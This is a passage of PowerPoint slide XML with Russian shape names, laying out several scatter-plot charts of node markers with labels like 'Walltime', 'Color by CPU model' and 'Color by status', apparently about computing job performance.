            <p:spPr>
              <a:xfrm>
                <a:off x="2521800" y="232848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6" name="Блок-схема: узел 27"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2592720" y="228960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7" name="Блок-схема: узел 28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3271680" y="268452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8" name="Блок-схема: узел 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3378240" y="273024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9" name="Блок-схема: узел 30"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3317400" y="277272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0" name="Блок-схема: узел 127"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3412440" y="279756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1" name="Блок-схема: узел 128"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3462120" y="271980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2" name="Блок-схема: узел 134"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3485160" y="280512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3" name="Блок-схема: узел 135"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2838600" y="261108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4" name="Блок-схема: узел 141"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2884320" y="256536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5" name="Блок-схема: узел 142"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2891160" y="261324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6" name="Блок-схема: узел 143"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2832120" y="252612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7" name="Блок-схема: узел 144"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2953080" y="259236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8" name="Блок-схема: узел 145"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2954520" y="253512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9" name="Блок-схема: узел 149"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2595240" y="312192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0" name="Блок-схема: узел 150"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2413800" y="284004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1" name="Блок-схема: узел 151"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2549520" y="243360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2" name="Блок-схема: узел 153"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3487320" y="299772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3" name="Блок-схема: узел 154"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3356640" y="287316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4" name="Блок-схема: узел 159"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2934360" y="297504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5" name="Блок-схема: узел 160"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2347560" y="160092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6" name="Блок-схема: узел 161"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2458080" y="171360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7" name="Блок-схема: узел 162"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2587680" y="187452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8" name="Блок-схема: узел 163"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2328480" y="167760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9" name="Блок-схема: узел 164"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2412360" y="163188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0" name="Блок-схема: узел 165"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2393280" y="175176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1" name="Блок-схема: узел 166"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2523600" y="171360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2" name="Блок-схема: узел 167"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2503800" y="181044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3" name="Блок-схема: узел 168"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2574360" y="1771560"/>
                <a:ext cx="45360" cy="4536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4" name="Блок-схема: узел 169"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3290040" y="241740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5" name="Блок-схема: узел 170"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3396960" y="246312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6" name="Блок-схема: узел 171"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3335760" y="250596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7" name="Блок-схема: узел 172"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3430800" y="253044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8" name="Блок-схема: узел 173"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3480480" y="245304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9" name="Блок-схема: узел 174"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3503520" y="2538000"/>
                <a:ext cx="45360" cy="45360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12600" rIns="90000" bIns="-12600" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="ru-RU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30" name="Подзаголовок 21"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1625400" y="1193760"/>
                <a:ext cx="972000" cy="343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rm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601"/>
                  </a:spcBef>
                  <a:tabLst>
                    <a:tab pos="0" algn="l"/>
                  </a:tabLst>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="0" u="none" strike="noStrike">
                    <a:solidFill>
                      <a:srgbClr val="0055A0"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uFillTx/>
                    <a:latin typeface="Segoe UI"/>
                    <a:ea typeface="Roboto Slab"/>
                  </a:rPr>
                  <a:t>Walltime</a:t>
                </a:r>
                <a:endParaRPr lang="ru-RU" sz="14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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="631" name="Группа 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4346014" y="799124"/>
            <a:ext cx="2589480" cy="2521440"/>
            <a:chOff x="4355640" y="1193760"/>
            <a:chExt cx="2589480" cy="2521440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="632" name="Прямая со стрелкой 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4820040" y="1476360"/>
              <a:ext cx="360" cy="173916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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="633" name="Прямая со стрелкой 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4820040" y="3208320"/>
              <a:ext cx="1870920" cy="36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634" name="Подзаголовок 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6343920" y="2871720"/>
              <a:ext cx="601200" cy="34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 fontScale="92500" lnSpcReduction="9999"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0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DB12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35" name="Блок-схема: узел 175"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5087880" y="210060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36" name="Блок-схема: узел 176"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5198400" y="221292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37" name="Блок-схема: узел 177"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5328000" y="237384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38" name="Блок-схема: узел 178"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5068800" y="217728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39" name="Блок-схема: узел 179"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5152680" y="213156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0" name="Блок-схема: узел 184"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5133600" y="225144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1" name="Блок-схема: узел 185"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5263920" y="221292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2" name="Блок-схема: узел 186"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5244120" y="230976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3" name="Блок-схема: узел 187"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5314680" y="227124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4" name="Блок-схема: узел 188"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5994000" y="266580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5" name="Блок-схема: узел 189"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6100560" y="271152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6" name="Блок-схема: узел 190"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6039720" y="275436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7" name="Блок-схема: узел 191"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6134400" y="277884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8" name="Блок-схема: узел 192"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6184440" y="270144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9" name="Блок-схема: узел 193"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6207480" y="278640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50" name="Блок-схема: узел 194"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5560920" y="259236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51" name="Блок-схема: узел 195"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5606640" y="254700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52" name="Блок-схема: узел 196"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613120" y="259452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53" name="Блок-схема: узел 197"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5554440" y="250776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54" name="Блок-схема: узел 198"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5675400" y="257400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55" name="Блок-схема: узел 199"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5676840" y="251676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56" name="Подзаголовок 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5068800" y="3210480"/>
              <a:ext cx="1492200" cy="504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 lnSpcReduction="9999"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1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Color by</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="1400" b="1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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1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CPU model</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="1400" b="1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 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57" name="Блок-схема: узел 200"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5311800" y="312552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58" name="Блок-схема: узел 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5130360" y="284364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59" name="Блок-схема: узел 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5266080" y="243720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60" name="Блок-схема: узел 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6203880" y="300132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61" name="Блок-схема: узел 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6073200" y="287676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62" name="Блок-схема: узел 206"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5650920" y="297864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63" name="Блок-схема: узел 207"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5074200" y="157500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64" name="Блок-схема: узел 208"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5184720" y="168768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65" name="Блок-схема: узел 209"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5314320" y="184860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66" name="Блок-схема: узел 210"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5055120" y="165168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67" name="Блок-схема: узел 211"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5139000" y="160596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68" name="Блок-схема: узел 212"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5119920" y="172584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69" name="Блок-схема: узел 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5250600" y="168768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70" name="Блок-схема: узел 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5230440" y="178452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71" name="Блок-схема: узел 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5301360" y="174564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72" name="Блок-схема: узел 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5989320" y="233748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73" name="Блок-схема: узел 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6095880" y="238320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74" name="Блок-схема: узел 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6035040" y="242604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75" name="Блок-схема: узел 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6129720" y="245052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76" name="Блок-схема: узел 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6179760" y="237312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77" name="Блок-схема: узел 224"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6202440" y="245808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78" name="Подзаголовок 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355640" y="1193760"/>
              <a:ext cx="972000" cy="34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0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Walltime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679" name="Группа 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1728094" y="3625844"/>
            <a:ext cx="2613600" cy="2522520"/>
            <a:chOff x="1737720" y="4020480"/>
            <a:chExt cx="2613600" cy="2522520"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="680" name="Прямая со стрелкой 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2226240" y="4306320"/>
              <a:ext cx="360" cy="173916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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="681" name="Прямая со стрелкой 18"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2226240" y="6038280"/>
              <a:ext cx="1870560" cy="36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682" name="Подзаголовок 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3750120" y="5701320"/>
              <a:ext cx="601200" cy="34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 fontScale="92500" lnSpcReduction="9999"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0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DB12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83" name="Блок-схема: узел 225"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2493720" y="493020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84" name="Блок-схема: узел 226"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2604240" y="50428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85" name="Блок-схема: узел 227"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2733840" y="520380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86" name="Блок-схема: узел 228"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2474640" y="50068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87" name="Блок-схема: узел 229"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2558520" y="496116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88" name="Блок-схема: узел 230"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2539440" y="508104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89" name="Блок-схема: узел 231"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2670120" y="50428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0" name="Блок-схема: узел 232"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2649960" y="51397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1" name="Блок-схема: узел 233"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2720880" y="510084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2" name="Блок-схема: узел 234"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3399840" y="549576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3" name="Блок-схема: узел 235"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3506760" y="55414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4" name="Блок-схема: узел 236"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3445560" y="558396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5" name="Блок-схема: узел 237"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3540600" y="560880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6" name="Блок-схема: узел 238"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3590280" y="553104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7" name="Блок-схема: узел 239"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3613320" y="561636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8" name="Блок-схема: узел 240"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2967120" y="542232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9" name="Блок-схема: узел 241"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3012840" y="537660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0" name="Блок-схема: узел 242"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3019320" y="542448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1" name="Блок-схема: узел 243"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2960280" y="533736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2" name="Блок-схема: узел 244"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3081240" y="540360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3" name="Блок-схема: узел 246"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3083040" y="534636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4" name="Подзаголовок 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2364120" y="6038280"/>
              <a:ext cx="1550880" cy="504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1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Color by status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5" name="Блок-схема: узел 247"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2722320" y="595656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6" name="Блок-схема: узел 248"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540880" y="567504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7" name="Блок-схема: узел 249"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2676600" y="526860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8" name="Блок-схема: узел 250"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3614400" y="583272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9" name="Блок-схема: узел 251"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3483720" y="570816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0" name="Блок-схема: узел 252"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3061440" y="580968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1" name="Блок-схема: узел 253"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2475000" y="440424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2" name="Блок-схема: узел 254"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2585520" y="451656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3" name="Блок-схема: узел 255"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2714760" y="46774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4" name="Блок-схема: узел 256"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2455920" y="44809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5" name="Блок-схема: узел 257"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2539800" y="443520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6" name="Блок-схема: узел 258"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2520720" y="45547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7" name="Блок-схема: узел 259"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2651040" y="451656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8" name="Блок-схема: узел 260"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2631240" y="461340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9" name="Блок-схема: узел 261"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2701800" y="45745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20" name="Блок-схема: узел 262"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3399840" y="517500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21" name="Блок-схема: узел 263"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3506760" y="52207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22" name="Блок-схема: узел 267"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3445560" y="526320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23" name="Блок-схема: узел 268"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3540600" y="528804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24" name="Блок-схема: узел 269"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3590280" y="52102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25" name="Блок-схема: узел 270"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3613320" y="529560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26" name="Подзаголовок 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1737720" y="4020480"/>
              <a:ext cx="972000" cy="34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0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Walltime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727" name="Группа 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4452214" y="3659324"/>
            <a:ext cx="2589480" cy="2515320"/>
            <a:chOff x="4461840" y="4053960"/>
            <a:chExt cx="2589480" cy="2515320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="728" name="Прямая со стрелкой 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4926240" y="4330440"/>
              <a:ext cx="360" cy="173916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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="729" name="Прямая со стрелкой 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4926240" y="6062040"/>
              <a:ext cx="1870920" cy="36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730" name="Подзаголовок 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6450120" y="5725440"/>
              <a:ext cx="601200" cy="34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 fontScale="92500" lnSpcReduction="9999"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0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DB12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1" name="Блок-схема: узел 271"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5194080" y="495432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2" name="Блок-схема: узел 272"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5304600" y="506664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3" name="Блок-схема: узел 273"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5433840" y="522756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4" name="Блок-схема: узел 274"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5175000" y="503100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5" name="Блок-схема: узел 275"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5258880" y="498528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6" name="Блок-схема: узел 276"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5239800" y="510516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7" name="Блок-схема: узел 277"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5370120" y="506664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8" name="Блок-схема: узел 278"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5350320" y="516384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9" name="Блок-схема: узел 279"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5420880" y="512496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40" name="Блок-схема: узел 280"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6100200" y="551952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41" name="Блок-схема: узел 281"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6206760" y="556524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42" name="Блок-схема: узел 282"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6145920" y="560808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43" name="Блок-схема: узел 283"/>
